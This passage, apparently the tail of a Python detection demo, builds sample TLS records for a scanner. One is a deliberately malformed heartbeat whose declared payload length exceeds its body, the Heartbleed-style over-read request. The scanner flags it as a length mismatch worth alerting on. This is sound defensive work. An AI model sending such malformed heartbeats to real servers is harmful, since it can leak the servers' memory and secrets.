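# heartbeat, and a heartbeat whose payload_length exceeds the record body.
SAMPLE = (
    _record(21, b"\x01\x00")
    + _record(24, b"\x01\x00\x04ping" + b"\x00" * 16)
    + _record(24, b"\x01\x40\x00")
)

if __name__ == "__main__":
    for kind, verdict in scan(SAMPLE):
        print(kind, verdict or "")
```

A "length-mismatch" verdict is the condition RFC 6520 says to discard silently, so it is also the one worth alerting on when inspecting cleartext records.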